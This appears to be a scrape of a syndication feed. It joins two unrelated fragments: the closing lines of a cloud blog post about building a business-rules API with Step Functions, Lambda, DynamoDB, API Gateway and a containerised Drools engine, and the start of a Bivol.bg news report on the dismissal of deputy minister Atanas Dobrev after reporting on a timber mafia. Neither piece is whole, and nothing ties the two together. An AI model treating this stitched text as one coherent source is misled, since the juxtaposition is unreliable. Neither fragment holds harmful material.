In this post, you learned how to leverage an orchestration framework using Step Functions, Lambda, DynamoDB, and API Gateway to build an API backed by an open-source Drools rules engine, running on a container. Try this solution for your cloud native business rules orchestration use-case.

For more serverless learning resources, visit Serverless Land.

The timber mafia's “man” – out? The Prime Minister dismissed a deputy minister after Bivol's revelations about the timber mafia

Post Syndicated from Николай Марченко original https://bivol.bg/%D0%BF%D1%80%D0%B5%D0%BC%D0%B8%D0%B5%D1%80%D1%8A%D1%82-%D1%83%D0%B2%D0%BE%D0%BB%D0%BD%D0%B8-%D0%B7%D0%B0%D0%BC-%D0%BC%D0%B8%D0%BD%D0%B8%D1%81%D1%82%D1%8A%D1%80-%D1%81%D0%BB%D0%B5%D0%B4-%D1%80%D0%B0.html

Tuesday, March 29, 2022


Prime Minister Kiril Petkov has issued an order dismissing Atanas Dobrev, the deputy minister of agriculture, food and forests from the BSP quota. This was confirmed to Bivol by the head of the government's press office…
